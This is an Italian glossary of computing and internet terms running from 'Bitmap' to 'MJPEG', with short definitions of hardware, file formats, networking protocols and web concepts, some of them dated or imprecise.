
Bitmap Immagine definita da una moltitudine di punti chiamati Pixel, come quelle ottenute a partire da un processo di numerizzazione (scanner) o direttamente generate da un programma di ritocco immagini.

BMP (Bitmap) Formato standard di file grafico per computers compatibili Windows. Bitmap sopporta colori codificati a 24 bit. 

BOT Termine colloquiale per indicare i programmi che ascoltano e rispondono ad una conversazione su un canale IRC.

BPS Bit al secondo. La misura della velocità di un modem.

Browser Software applicativo che offre un'interfaccia grafica interattiva per ricercare, trovare, visualizzare e gestire informazioni di una rete.

Bubble-Jet E' la tecnologia proprietaria Canon per le stampanti a getto d'inchiostro, che utilizza il calore per forzare l'espulsione delle gocce d'inchiostro. Assume una particolare importanza perché è stata la prima forma di stampa a getto presente sul mercato.

Buffer Underrun Designa l'approvvigionamento insufficiente di dati da parte della memoria nascosta di un duplicatore di CD Rom. Questo fenomeno, dovuto ad un guasto o ad una debole prestazione del disco duro, causa l'interruzione della registrazione.

BUG (errore) nel 1947, un insetto suicida si introdusse furtivamente in un “paleocomputer” a valvole. L'intrusione causò un malfunzionamento dell'elaboratore, creando problemi a programmatori e progettisti che non ne comprendevano la ragione. Da allora bug è sinonimo di un malfunzionamento di un programma del quale non è sempre individuabile la causa. Data la complessità degli attuali programmi, si tratta di un fenomeno estremamente frequente e che si tenta prima di arginare, passando attraverso varie fasi dello sviluppo di un'applicazione, ad esempio la ben nota versione beta, e poi di risolvere mediante i cosiddetti patch file.

 

C

Cache del Browser Parte di memoria che contiene immagini e testo dei siti visitati in modo che la navigazione sia più rapida se si rivisita quella pagina.

Campionamento Audio i suoni ed il parlato devono essere trasformati in sequenze numeriche per poterli memorizzare sui CD. La conversione analogica in digitale è tanto più fedele all'originale quanto maggiore è la sequenza di bit utilizzata per seguire (campionare) l'onda acustica. Per il parlato, è sufficiente una campionatura a 8 bit e 16.000 Hz; per la musica è ottimale 16 bit e 44.000 Hz.

Canale  Percorso di comunicazione (pipe) con una determinata capacità (velocità) tra due ubicazioni di una rete.

Canal Alpha Oltre ai colori, certi oggetti grafici contengono informazioni sulla loro opacità. In tal modo, vengono aggiunti dei dati al fine di definire, per ogni pixel, un livello di trasparenza chiamato Canal Alpha.

Capacità Massima velocità di trasmissione di dati in modo affidabile supportata da un canale, circuito o parte di un'apparecchiatura.
La capacità si può esprimere come velocità nominale o come quantità netta di dati inviati.

Carrier Fornitore di servizi di telecomunicazione che possiede centrali di commutazione di rete.

Carrier Pubblico Carrier che offre un servizio al pubblico o a un settore del pubblico (indipendentemente dall'identità del cliente e senza discriminazioni).

Cartuccia E' la parte che contiene il serbatoio o i serbatoi dell'inchiostro ed è sostituita quando questi si sono esauriti; in alcuni modelli contiene anche parte dei circuiti della testina di stampa, garantendo l'utilizzo di una testina sempre nuova e quindi poco soggetta all'invecchiamento e all'usura, pagando naturalmente un prezzo maggiore ad ogni sostituzione.

CATV (Community Antenna Television) Televisione via cavo o fornitura in abbonamento di servizi televisivi nelle abitazioni per mezzo di cavo coassiale. La legge federale del 1994 consente alle società CATV di offrire anche servizi telefonici sulle autostrade informatiche.

CERN Laboratorio europeo di fisica nucleare in cui si è svolta la prima conferenza World Wide Web. Viene considerato il luogo di nascita della tecnologia WWW. Le ricerche sulla tecnologia WWW e la definizione dei relativi standard sono ora affidate alla World Wide Web Organization (W3O, in w3.org). http://www.cern.ch/

CGI (Common Gateway Interface) Consente di eseguire su un server Web un programma (oppure uno script, cioè una sequenza di comandi e risposte) realizzato con un linguaggio di programmazione come C, C++, Perl, VisualBasic, restituendo il risultato dell'elaborazione sul browser remoto. Le funzionalità CGI, sono tipicamente usate per la consultazione interattiva (cioè ricerche e risposte) in Internet di banche dati collegate alle pagine HTML.

CHAP ( Challenge Handshake Authentication Protocol )
Protocollo di autenticazione con verifica in fase iniziale. Un sistema di cifratura delle password che fa parte del protocollo PPP e che viene utilizzato per verificare periodicamente l'identità del client che richiede l'accesso ( peer ) usando una procedura di handshake  (negoziazione) a tre vie.

Chat Termine usato per descrivere le conferenze in tempo reale. “IRC”, “WebChat”, “prodigy” e “chat room aol” sono esempi di “chat”.

Chipset Gioco di componenti che permettono al processore di lavorare con il resto della carta madre. Oggigiorno ridotto a uno o due componenti, permette di produrre carte madri di formato ridotto.

Ciberspazio Termine coniato da William Gibson nel suo romanzo “Neuromancer”, in cui si narra di interconnessioni dirette tra computer e cervello.

Client In un collegamento, è definito server il sistema che offre dei servizi, e client quello che li utilizza. Un browser ad esempio è il client che permette di accedere ai servizi forniti dai server Internet.

Clock Cycle Unità elementare di tempo di un PC, definita dalla sua frequenza d'orologio. Ogni azione di un microprocessore richiede almeno un ciclo per potersi eseguire.

Cluster Quantità di spazio minima occupata da un file sul disco duro. Un file di un octet occupa 32 Mb di spazio disco nell'ambito di una partizione di 2 GB.

CMYK Colori impiegati nel settore delle edizioni per l'impressione in quadricromia (Cyan, Magenta,Yellow, Blak) E' anche uno dei modi disponibili nei programmi di ritocco immagini, ove l'insieme dello spettro dei colori viene simulato da un processo di sovrapposizione di questi quattro colori.

Codec Pilota di programma che permette la compressione/decompressione di flussi video e sonori. I codecs Windows sono incapsulati nel formato AVI.

Collo di Bottiglia Limite della capacità di un sistema che può ridurre il traffico in condizioni di carico elevato.

Compact Flash Supporto di memoria amovibile di piccola taglia (formato carta di credito). Particolarmente ben adattato agli apparecchi fotonumerici, é in grado di stoccare da 2 a 40 Mo. Viene collegato al PC per mezzo del porto PCMCIA.

Compressione / Decompressione Metodo di codifica/decodifica dei segnali che consente di trasmettere (o archiviare) più informazioni di quelle che altrimenti troverebbero fisicamente posto sul supporto di memorizzazione.

Collegamento Ipertestuale Collegamento tra insiemi di informazioni.

Consolidation Quando un compito da realizzare comporta numerosi aspetti di natura differente, é possibile scomporlo in diverse operazioni più facili da gestire. Quando ciascuno di questi subcompiti ha effettuato le operazioni richieste, si possono reintegrare nel progetto globale per mezzo di una consolidazione.

Cookie (biscottino) Accedendo ad alcuni siti Internet, viene inviato un file (cookie) che si colloca nella cache (porzione di memoria del browser) e raccoglie alcune informazioni del vostro computer, utilizzandole per mostrarvi magari un banner piuttosto che un altro. Le “leggende metropolitane” dicono che vìola la vostra privacy restituendo le informazioni al sito dal quale è partito. In generale, questo non è vero (la maggior parte dei cookies rimane nel vostro computer: per inviare i dati al server occorre utilizzare potenti linguaggi di programmazione), altresì ricevereste una montagna di posta elettronica.

CPU (Central Processing Unit) Unità di trattamento centrale, ovvero il microprocessore.

CRC (Cyclical Redundancy Check) Sistema di calcolo che garantisce l'integrità dei dati che gli sono trasmessi.

Criptato segreto, codice che dovrebbe permettere di essere letto solo da chi conosce la tecnica di decriptazione. Usato per comunicazioni riservate, o per impedire che il messaggio originale venga modificato da persone non autorizzate

Criptazione E' il metodo di codifica dei dati che impedisce che estranei ne abbiano accesso senza autorizzazione. Garantisce la privacy nelle comunicazioni via Rete: la tecnica più nota è quella a chiave pubblica/privata della RSA utilizzata per i cosiddetti server sicuri dedicati al commercio on line.

Cyber Squatting occupazione abusiva di un nome di dominio.

 

D

Daemon un programma che con il sistema operativo UNIX, funziona costantemente in background sul server, pronto a entrare in azione su richiesta di altri programmi. Può segnalare l'arrivo di un messaggio di posta elettronica; gestire la stampa in background di un documento; fungere da scheduler, ossia un programma che ne attiva altri ad orari programmati.

DAT (Digital Audio Tape) registrazione acustica o video registrata su nastro in formato digitale.

Database Insieme di informazioni multi-utente. SUPporta spesso la selettività ad accesso casuale e le “viste” multiple o i livelli di astrazione dei dati sottostanti.

DDC (Data Display Channel) Dispositivo che permette ad un monitor di comunicare le proprie caratteristiche alla scheda grafica. Richiede un PC dotato di Windows 95/98.

DDC1/2B standard per l'attuazione del paradigma plug'n'play anche nel campo dei monitor, ha come scopo quello di riuscire a rilevare automaticamente le combinazioni di parametri più adatte ad ogni monitor.

Debug Utilitario per detectare errori (bugs) in seno ad un programma.

Default Impostazione standard predefinita, studiata per rispondere alle esigenze della maggior parte dell'utenza. Può essere modificata mediante le opzioni disponibili, per soddisfare le necessità individuali di personalizzazione.

Detramer Azione di eliminare la trama di un'immagine. Poco visibile all'occhio nudo, questa appare evidente se il documento viene numerizzato con una risoluzione elevata. A seconda del pilota dello scanner, il detramaggio viene effettuato sia automaticamente che seguendo diversi parametri.

Device Bay Tecnologia sviluppata congiuntamente da Compaq, Intel e Microsoft che consente di aggiungere o rimpiazzare delle periferiche (CD Rom, DVD, unita di salvaguardia, ecc.) a “caldo”, ovvero senza dover riaccendere il computer. Le periferiche rispondenti a questa norma, potranno inoltre essere installate evitando di aprire la macchina.

DHTLM (Dynamic HTLM) Un'estensione del linguaggio HTLM che consente la creazione di effetti di presentazione per testi ed oggetti. 

Dial-up Una delle modalità di accesso a Internet, quando non si è fisicamente un nodo della Rete. E' la classica connessione via telefono a un altro computer.

Digitale Si dice di dispositivo o tecnica che sfrutta le variazioni discrete di tensione, frequenza, ampiezza, posizione, ecc. per codificare, elaborare o trasmettere segnali binari (zero e uno) per dati audio, video, computerizzati o di altro tipo.

DIMM (Dual In-line Memory Module) Nuova barretta di memoria che comporta 168 connettori e che é indirizzabile su 64 bits, contro, ad esempio, i 32 bits per le Simm a 72 connettori.

Disk at Once Metodo d'incisione del CD Rom che viene in tal modo “bruciato” senza pause. Il laser non abbassa mai d'intensità e questo garantisce una maggiore affidabilità.

DLL (Dynamic Link Library) Biblioteca di legami dinamici, altrimenti detta programma, che asseconda un'applicazione Windows per dei compiti ben precisi. Per esempio, CTL3D e DLL creeranno gli effetti 3D nel box di dialogo.

DMA (Direct Memory Access) Meccanismo di accesso diretto alla memoria (via un canale privilegiato e senza transitare dal processore) per accellerare l'interscambio di dati entro materiale e pilota.

DNS Ciascuno degli host che formano Internet è contrassegnato in modounivoco da un numero, che va utilizzato per collegarsi ad esso. Per evitare agli utenti di dovere utilizzare questi numeri, sostituendoli con nomi più facili da ricordare e più significativi, esiste un database (il DNS, appunto) nel quale a ciascuno dei nomi è associato il numero che gli corrisponde. Quando l'utente indica un indirizzo, un URL, al proprio browser, ( per esempio http://www.tiscalinet.it ), il sistema “interroga” dunque il DNS per conoscere il numero dell'host al quale deve collegarsi, quindi effettua la connessione.

Dolby dal nome dell'ingegnere Ray Dolby, è un sistema di riduzione del fruscio derivante dallo scorrimento del nastro contro le testine.

  • D. SURROUND è un sistema di riproduzione del suono con il quale le convenzionali caratteristiche della riproduzione stereofonica (diffusore destro/sinistro) vengono esaltate grazie all'impiego di diffusori posteriori: si ottiene cosí un maggior realismo, particolarmente nelle scene d'azione.
  • D. SURROUND PRO LOGIC tipo di decodifica audio multicanale del sistema D. Surround. Elaborando un segnale stereofonico con tale codifica vengono ricreati altri due canali monofonici: il canale centrale, destinato a riprodurre i dialoghi; il canale posteriore (monofonico e sdoppiato su 2 o più diffusori posti dietro o a fianco dello spettatore), ha il compito di aumentare l'effetto presenza. Completano il sistema i due diffusori laterali destro e sinistro a banda audio completa che riproducono gli effetti principali. Questo sistema di decodifica audio è attualmente il più diffuso nella cinematografia, nei CD ed in alcune videocassette.

Domain Name Indirizzo della locazione di un server che identifica il proprietario di questo indirizzo.

Dominio Nella particolare geografia della Rete, delimita una parte targata nello stesso modo. E' riconoscibile nella parte terminale di un indirizzo elettronico: .edu, .org, .com, etc per l'America, con un acronimo del nome per gli altri Paesi (.it per l'Italia, .fr per la Francia e così via). Ogni sito Internet ha un dominio.

Dot Pitch è la distanza, misurata in mm, tra i pixel. Un punto sullo schermo è formato da tre colori primari (rosso, verde, blu): il dot pitch misura la distanza tra i punti dello stesso colore che compongono l'immagine. Tipicamente la distanza è 0.28 mm, per arrivare a 0.22mm.

Download E' lo scaricamento di un file dal computer remoto al proprio (contrario di upload, l'operazione con la quale si “mette in rete” un file del proprio disco fisso).

DPI Punti per pollice, è la misura della risoluzione della testina di stampa, in altre parole quanti punti diversi una periferica è in grado di stampare o visualizzare in un pollice di lunghezza (1 pollice è circa 2,5 cm).

Driver Programma utilizzato dal sistema operativo per accedere alle apparecchiature presenti all'interno del computer o a esso collegate.

DSL  Insieme di tecnologie per la trasmissione a banda larga su cavi telefonici in rame (doppino telefonico).

DSP (Digital Signal Processor – elaboratore di segnali digitali) E' un sistema di elaborazione digitale di un segnale audio con codifica stereo o multicanale. Messo a punto dalla Yamaha, il DSP ricrea artificialmente i ritardi e l'assorbimento delle onde sonore in ambienti di riferimento quali cinema, teatri, stadi, arene.

DVD (Digital Versatile Disk) E' un supporto apparentemente identico ai CD-ROM, ma con capacità d'immagazzinare dati maggiore, variabile dai 4,7 ai 17 GB, a seconda delle opzioni e tecniche impiegate (doppia faccia/doppia densità). Nel 1996 é stato concluso un accordo per fissare le principali norme di fabbricazione dei DVD. La commercializzazione dei DVD è stata divisa in 6 aree geografiche, alle quali corrispondono altrettante codifiche specifiche che rendono teoricamente incompatibili tra loro la visione dei DVD acquistati in aree geografiche differenti. La ragione di detta divisione, è evitare che film usciti per esempio nelle sale Usa e disponibili in DVD, giungano in altri mercati prima della loro distribuzione nelle sale cinematografiche.

Dynamic HTML
Chiamato HTML dinamico, è una rinnovata versione del linguaggio descrittivo delle pagine HTML che permette di creare pagine web con animazioni e maggiore interattività della precedente versione.

 

E

ECC (Error Checking and Correcting) Sistema generalmente applicato alla memoria centrale del PC o del server, al fine di ridurre considerabilmente il tasso di errore riscontrato nell'interscambio di dati in memoria.

ECP (Extended Capabilities Port) Migliora la velocità e la “souplesse” della porta parallela.

El Torito Formato di CDRom che permette di avviare il computer a partire dal lettore di CDR. Per consentire questo, occorre che il Bios supporti questa funzione. El Torito é il nome del ristorante ove é stato ideato il formato.

E-Mail (Electronic Mail) Messaggio trasmesso da un utente ad un altro attraverso computer collegati in rete locale o via Internet. Tale messaggio è composto da un'intestazione che contiene l'indirizzo del destinatario, l'oggetto del messaggio, una voce “cc” dove è possibile specificare l'indirizzo di altri destinatari che debbano ricevere lo stesso messaggio, e da un corpo che contiene il testo da trasmettere. I protocolli più diffusi per ricevere i messaggi di posta elettronica sono IMAP e POP3. Ai messaggi di Email può essere accluso un attachment.

EPA Energy Star Si tratta di uno dei primi standard di risparmio energetico, che prevede la possibilità di passare ad una modalità di stand-by, comandata dal computer cui il monitor è collegato, riducendo in maniera sensibile il consumo di elettricità.

EPS (Encapsulated Post Script) Un'estensione del Post Script graphic file format sviluppata da Adobe Systems. EPS consente ai files grafici di essere incorporati in altri documenti.

Esacromia Consiste nell'aggiunta di due ulteriori inchiostri alla testina di stampa (ciano chiaro e magenta chiaro), che consente di stampare sfumature più sottili, ottenendo risultati migliori specialmente nella stampa delle tonalità della pelle..

Ethernet Una diffusa architettura per le reti locali (LAN), concepita da Xerox Corporation, che consenti di collegare fino a 1.024 nodi.

 

F

FAQ Acronimo di Frequently Asked Question (domande ricorrenti). Sono vere e proprie collezioni di risposte ai dubbi più ricorrenti.

Fast Ethernet Un tipo particolare di Ethernet che funziona a 100 Mbit per secondo invece che a 10 Mbit.

FAT (File Allocation Table) Tavola ove il sistema operativo registra il piazzamento dei pezzi di un file su un disco o un dischetto. Utilizzato da MS Dos e Windows 3.1 é stato poi rimpiazzato dal VFAT (VirtualFAT) di Windows 9x.

FAT 32 Gestione 32 bits della tavola di allocazione dei files, disponibile sui nuovi PC venduti con Windows 95 OSR2. Windows 98 permette di convertire gli attuali FAT 16 bits in FAT 32 bits.

File Collezione di dati ai quali viene assegnato un nome, per essere poi che stoccati nel computer.

File Server  Computer che offre l'accesso ai file agli utenti remoti (client).

Finger Protocollo di Internet che consente di trovare informazioni sugli utenti della rete. Alcune reti non consentono l'uso di questo programma utilizzato da un sistema esterno, mentre altri non lo consentono del tutto.

Firewall letteralmente parete muro antincendio. Si riferisce ai sistemi adottati per impedire accessi non autorizzati alle banche dati bloccando i pacchetti sospetti. Una società installa normalmente un firewall per consentire agli utilizzatori l'accesso Internet, proteggendo nello stesso tempo i propri dati personali. Il termine antincendio, metaforicamente si riferisce ai danni che possono essere prodotti dalla manomissione dei dati o dall'acquisizione di notizie a scopo di spionaggio industriale e politico).

Fire Wire (IEEE-1394) Nuova norma ad alta velocità per la connessione plug and play di apparecchiature elettroniche a dei microcomputers. Ideata da Apple, é stata poi adottata da Sony, Yamaha, Texas Instrument e Toshiba.

Firmware Gioco di instruzioni situato in un materiale (modem) che potrà essere aggiornato via un programma.

Flame War Uno scambio protratto di opinioni relative ad un argomento irrisolvibile condotto in rete Usenet che degenera spesso in insulti.

Flash Tecnologia che permette di cambiare il microcode di un apparecchio per mezzo di un programma. Autorizza inoltre un'aggiornamento continuo, a seconda dell'esigenze imposte da nuovi standards.

Folder Area di stoccaggio in un computer alla quale si assegna un nome, contenente files o altri folders.

Frame Una delle sezioni indipendenti in cui è divisa una pagina Web. Ogni frame è la visualizzazione di una pagina web indipendente, corrispondente ad un file HTML a sé; può avere le sue barre di scorrimento a meno che non vengano disabilitate nel codice HTML.

Freeware Freeware è il software che potete scaricare, copiare e ridistribuire liberamente senza essere tenuti a corrispondere alcuna forma di pagamento all'autore (contrariamente a quanto accade con software shareware). Un software freeware è comunque sempre soggetto a copyright: non può essere quindi modificato o copiato nel suo codice oppure venduto come proprio, utilizzi possibili invece con software distribuiti come public domain.

FTP (Files Transfer Protocol) è il formato per trasferire scambievolmente audio, video, immagini e testi tra il vostro computer ed un server remoto. Poiché i programmi FTP comprendono la funzione Upload, potete scaricare su un server i files che compongono il vostro sito.

 

G

Gateway  Convertitore di protocollo. Un nodo specifico dell'applicazione che collega tra loro reti altrimenti incompatibili. Converte i codici dei dati e i protocolli di trasmissione per garantire l'interoperabilità.

GDI (Graphic Device Interface) File .DLL che include tutte le API grafiche di Windows: é resposabile delle funzioni di disegno di linee e della gestione dei colori.

GIF (Graphics Interchange Format) Formato standard per i file grafici su WWW. Il formato GIF è molto diffuso perché utilizza un metodo di compressione integrato che riduce le dimensioni dei file. Tale formato ha lo svantaggio di lavorare olamente con 256 colori, ma il vantaggio di creare immagini animate anche con sfondi invisibili.

GMR (Giant Magneto Resistive) Tecnologia delle teste di lettura induttive del disco duro, sviluppato da IBM per consentire una migliore affidabilità.

GOPHER Programma di browsing (esplorazione) e ricerca delle basi dati di Internet.

GPRS (Global Packet Radio System) Questa tecnologia, in corso di applicazione da parte dei principali operatori europei, autorizza delle trasmissioni in modo packet sui networks GSM attuali. Per l'utilizzatore, la capacità dovrebbe passare da 9,6 Kbits/s, a più di 40 Kbits/s. L'utilizzazione del GPRS necessiterà tuttavia di nuovi terminali.

GUI (Graphical User Interface) Rappresenta l'interfaccia grafica di un programma.

 

H

Hacker  Nel gergo del Mit degli anni'60 l'hack, alla lettera il gancio, il tiromancino, era uno scherzo tecnologico assai elaborato. Oggi il sostantivo assume una connotazione positiva o negativa a seconda del contesto in cui viene usato. L'hacker è comunque un grande esperto di reti, uno che sa, con grande perizia, muoversi tra i computer collegati, ma spesso la sua abilità lo porta a infrangere i divieti e diventare “pirata informatico”, facendo irruzione in macchine e database cui non potrebbe avere accesso.

Hayes  E' stato il produttore di modem per antonomasia, tanto da far si che si identifichino i comandi delle sue macchine come gli standard industriali (si dice Hayes­compatible per i modem come si dice Ibm­compatible per tutti gli elaboratori non Mac).

Hertz  Unità di misura che indica il numero si oscillazioni al secondo di un'onda acustica od elettromagnetica.

Home (Home Page) Pagina iniziale di un sito, contenente informazioni di identificazione e di indice.

Host riferendosi ad Internet, è un computer attraverso il quale è possibile comunicare con altre macchine (per es., la macchina che si trova a un estremo della connessione e identificata da un suo indirizzo IP permanente). Generalmente, l'host è il server al quale ci si collega per prelevare file, ma può anche essere il proprio computer se costituisce parte integrante della rete e dispone di un proprio indirizzo fisso. Solo due tipi di macchine possono collegarsi direttamente a Internet: gli host e i router, tutti gli altri sistemi accedono alla rete attraverso l'intermediazione di questi due.

HSL Corrisponde ad un modo di rappresentazione dei colori, ove un utilizzatore sceglie una tinta da una paletta di colori ed agisce in seguito sulla saturazione e luminosità di quest'ultima, per ottenere il colore desiderato.

HTML (Hypertext Markup Language) Linguaggio di descrizione delle pagine web adottato dalla comunità Internet. Non si tratta di un vero e proprio linguaggio di programmazione, bensì di un linguaggio di formattazione. Consiste infatti in istruzioni testuali che contengono le specifiche per l'impaginazione della pagina stessa. E' possibile scriverlo a mano con qualunque editor di test, ma anche farlo generare in maniera più o meno automatica da un edit HTML come Frontepage di Microsoft o Netscape Composer.

HTTP (Hypertext Transfer Protocol) Il protocollo Internet che consente ai browser Web di trovare informazioni dai World Wide Web servers. 

 

I

IDE (Integrated Drive Electronics) Interfaccia di connessione classica del disco duro, lettore di CDRom o ZIP. All'origine questa interfaccia permetteva di alleggerire il disco duro, integrando dei componenti direttamente sulla carta madre.

Image ISO File stoccato nel disco duro che riprende la struttura esatta di un CDRom al fine di duplicarla. È generata grazie ad un programma di duplicazione e può arrivare fino a 650 Mb.

IMAP (Internet Message Access Protocol) E' è un protocollo standard per ricevere posta elettronica. Utilizzando il protocollo IMAP l'Email viene gestita e mantenuta direttamente sul server di posta elettronica a differenza del protocollo POP3 dove l'Email viene cancellata dal server una volta che è stata scaricata e letta. Con il protocollo IMAP è possibile mantenere un archivio centralizzato e condiviso del traffico Email.

INDIRIZZO IP Indirizzo a 32 bit del protocollo Internet assegnato ad un host. L'indirizzo IP comprende un componente host e un componente di rete.

Ink-Jet Getto d'inchiostro, è il nome comune con cui s'identificano le stampanti con questa tecnologia.

Interlaced GIF Immagine in formato GIF che viene affissa incrementando i dettagli in modo graduale, sino al completo carico del file. 

Internet E' la “madre di tutte le reti”. Figlia di Arpanet, network che nasce nel '69 per fini militari, si distanzia presto dalle intenzioni originarie, diventa strumento della ricerca universitaria negli anni'70 e '80, finisce per interconnettere (internetworking, appunto) tutte le altre reti telematiche grazie alla versatilità del protocollo TCP/IP, fino al portentoso successo di pubblico degli anni '90. 

Internet Service Provider Società che fornisce il servizio di connessione Internet a privati, società ed istituzioni.

Interpoled Resolution (Risoluzione Interpolata) Per gli scanners esistono due fattori che influenzano la qualità di numerizzazione: la risoluzione ottica (risoluzione massima fisicamente applicabile) e la risoluzione interpolata. Quest'ultima é artificiale e viene dedotta aggiungendo dei nuovi punti entro quelli realmente identificati, grazie all'uso di algoritmi particolarmente sofisticati.

INTRANET
Una rete ad accesso ristretto che funziona come il Web, ma non si trova sul Web. Generalmente posseduta e gestita da un'azienda, una rete Intranet permette a una società di condividere le proprie risorse con i suoi impiegati, senza rendere disponibili le informazioni confidenziali a tutti gli utenti che dispongono di un accesso a Internet. 

IP (Internet Protocol)
Protocollo Internet che definisce le unità di informazione passate da un un sistema all'altro per garantire un servizio di base per l'inoltro dei pacchetti di dati.

IP Address (Internet Protocol Address) Il mezzo standard di identificare un computer collegato su Internet, come un numero di telefono identifica un apparecchio telefonico. Un indirizzo IP è composto da blocchi di quattro numeri separati da un punto ed ogni blocco è inferiore a 256 (es. 192.204.126.49).

IP Address Mask (Internet Protocol Address Mask) Gamma di indirizzi IP definiti in modo tale che solo i computers con IP entro tale gamma possano collegarsi su Internet. Per mascherare una porzione dell'indirizzo IP, rimpiazzala con un asterisco (*). Ad esempio 192.204.*.* rappresenta ogni computer su Internet con un indirizzo IP che comincia con 192.204.

Ipermedia
Sistema ipertestuale in grado di visualizzare informazioni in unità discrete, o nodi, connesse da collegamenti. Le informazioni possono essere presentate in vari modi: sotto forma di testo, grafica, audio, video, animazioni, immagini o programmi.

Ipertesto Con questo termine, coniato nel 1965 da Tedd Nelson, si vuole indicare quell’insieme di strumenti di comunicazione che, sfruttando la potenzialità dei supporti hardware, hanno portato al superamento dei limiti imposti dalla struttura sequenziale dei testi tradizionali, permettendo di saltare da un argomento ad un altro. Nella forma più semplice, sono le pagine WEB: le parole colorate e sottolineate, rimandano ad altre voci presenti nella pagina stessa o in altre pagine. Se ben realizzato, un ipertesto consente di padroneggiare la struttura d'insieme di un argomento. 

IRC (Internet Relay Chat) Forum di discussione interattiva su Internet.

IRQ (Interrupt Request) Livello di richieste d'interruzione. Una periferica materiale utilizza un'interruzione ad un prederminato IRQ.

ISDN (Integrated Services Digital Network)
Insieme di standard per la trasmissione simultanea ad alta velocità di voce, dati e immagini su un numero minore di canali rispetto a quelli richiesti dai sistemi di segnale fuori banda.
 

 

J

Java Linguaggio di programma  creato da Sun Microsystems ed utilizzato per programmare piccole applicazioni (Applets) per il Web.

Java Applets Classe di Java che viene caricata e attivata da programmi utilizzanti applicazioni Java, come i Web browsers. I Java Applets sono frequentemente utilizzati per aggiungere effetti multimediali ed interattività a pagine Web, come video, animazioni, calcolatori, orologi e giochi interattivi.

Java Script Linguaggio di script sviluppato da Nescape Communications e Sun Microsystems. Rispetto ai Java Applets, i Java Script sono più limitati in quanto non vengono compilati prima della loro esecuzione.

JDK (Java Developement Kit) Ambiente di programmazione sotto Java. La versione attuale di JDK di Sun é la 1.2 che corrisponde alla 2 di Java.

JPEG (Joint Photographic Expert Group) Formato molto compatto di un'immagine compressa, con perdita di qualità all'arrivo. Il livello di compressione é variabile.

 

K

KB (Kilobyte) Multiplo del byte corrispondente a 1024 byte.

kb (kilobit) Multiplo del bit corrispondente a 1024 bit.

kbps (kilobit per secondo) Corrispondente a 1024 bit per secondo.

Kernel Parte più interna di un sistema operativo costituita da procedure che sincronizzano lo scambio di informazioni tra i differenti processi in esecuzione e il processore, e interagiscono con l'hardware gestendo risorse quali la memoria, le unità disco e le periferiche.

Key (Chiave) Nella cifratura e criptazione è la tecnica impiegata per cifrare un testo in chiaro, in modo che assuma un aspetto incomprensibile.

 

L

LAN (Local Area Network) Tecnologia di computer in network che consente di collegare computers (con cavi in rame, fibra ottica o canali radio) separati fra di loro da brevi distanze. Un LAN può collegarsi su Internet e può essere configurato come Intranet. Esistono diversi tipi di rete locale, tutti caratterizzati dal fatto di trasmettere dati ad alta velocità (da 100 Kbps a 1 Gigabit per secondo).

Larghezza di Banda Misura della capacità di comunicazione o velocità di trasmissione di un circuito o di un canale.

Layer Questo termine é utilizzato per qualificare i diversi metodi di compressione sonora per strati del formato Mpeg. Esistono tre livelli: Layer I, II e III.

Lazo Strumento grafico che permette di effettuare selezioni libere, trascinando il mouse attorno al soggetto. 

LBA (Logical Block Addressing) Dispositivo che consente ad un disco duro di più di 528 Mo, di superare questa barriera imposta dal sistema MS-Dos.

Linea Dedicata  Linea privata noleggiata da una società di telecomunicazioni.

LINK  I collegamenti verso altri siti o che indirizzano a parti diverse della stessa pagina web. Sono loro che rendono la struttura di internet ipertestuale.

List – Serv  Programma gratuito che automatizza la gestione e l'inoltro di elenchi di indirizzi di posta elettronica. Esistono elenchi di indirizzi per svariati argomenti. Vi sono elenchi”aperti”, dove qualunque utente iscritto nell'elenco può inviare un messaggio a tutti gli altri utenti, come in una conversazione, ed elenchi “chiusi”, che possono ricevere messaggi solo di alcuni utenti.

Livello Strato o Piano dell'immagine; pensando a più fogli traslucidi uno sopra l'altro, l'immagine è il risultato di della loro sovrapposizione. E' possibile attivarli e lavorare su di uno alla volta, così come unirli e fonderli in un unico livello.

Logical Sector Unità di base di supporto di stoccaggio. Sotto MS-Dos, il numero dei settori logici é limitato a 65.536. Per i grossi dischi, il settore logico é un multiplo del settore fisico di un disco duro.

Login processo con cui viene identificato un utente (a volte dietro richiesta di password) per accedere ad un servizio. Per esempio, il login avviene automaticamente all'accensione di un telefono cellulare con la richiesta del codice PIN.

LVD (Low Voltage Differential) tecnologia che permette di trasmettere delle informazioni su lunghe distanze, senza perdita di segnale.

 

M 

Mailing-List  Lista di indirizzi e-mail. Le lettere inviate a tale elenco vengono spedite automaticamente a tutti gli iscritti della lista.

Mask Porzione di un'illustrazione designata dall'utilizzatore grazie agli adeguati strumenti contenuti nel suo programma di ritocco immagini. Tutte le operazioni effettuate sotto maschera, riguarderanno solamente la zona designata da questa.

Media  Supporto e formato di archiviazione e distribuzione delle informazioni (ad es. videocassette, dischetti, dischi ottici, stampati, ecc.). Questo concetto comprende tutti gli strumenti usati dall'uomo per comunicare.

MIDI (Musical Instrument Digital Interface), è un protocollo standard che consente ai computer di comunicare con gli strumenti musicali, ad es. sintetizzatori.

MIME (Multipurpose Internet Mail Extention type) Metodo usato dai browser Web per associare files di un certo tipo con applicazioni che affiggono files di quel tipo.

MMX (Multimedia Extentions) Funzioni proposte da Intel al fine di dotare il processore di capacità multimediali, senza l'aggiunta di carte specifiche.

MNP (Microcom Network Protocol) E' un protocollo di controllo errori sviluppato dalla società Microcom, diventato di pubblico dominio.

Modem (MODulatore DEModulatore), dispositivo che trasforma i segnali numerici elaborati dal computer in segnali adatti ad essere inviati su cavo telefonico (modulazione) e viceversa (demodulazione).

Morphing procedimento di dissolvenza mediante il quale un'immagine si trasforma gradatamente in un'altra. Per esempio, in un film horror, il volto di una persona può assumere l'aspetto di un lupo.

Motion Blur Termine utilizzato per descrivere un effetto grafico speciale che si applica ad un oggetto inanimato, con lo scopo di simulare un effetto di movimento rapido.

Motore di Ricerca  Strumento sul web che permette la ricerca dei siti desiderati sulla base o di parole chiave o di una struttura ad indice che elenca un insieme di siti suddivisi per argomenti.

MP3 (Mpeg 1 livello 3) Si tratta di una tecnica di compressione dei file audio. Questa compressione agisce eliminando dal suono in qualità CD audio tutte le informazioni sonore che vanno oltre la gamma di frequenze da 20Hz (suoni bassi) a 20.000Hz (suoni alti) che il nostro orecchio può udire.

MJPEG (Motion Joint Pictures Encripted Graphics), le immagini di un film codificate digitalmente per essere gestite da un computer consumano risorse eccessive. Per questa ragione si ricorre a sistemi di semplificazione delle immagini, intervenendo su particolari poco rilevanti (semplificando al massimo, una zona “z” di colore e luminosità quasi costante viene considerata non nella sua estensione ma come un particolare moltiplicato per un numero: z+z+z+z+z = 5xz): le differenze sono eliminate e se la compressione è elevata si ha degrado della qualità. I film digitalizzati in MJPEG non richiedono una decodifica per la loro visione.

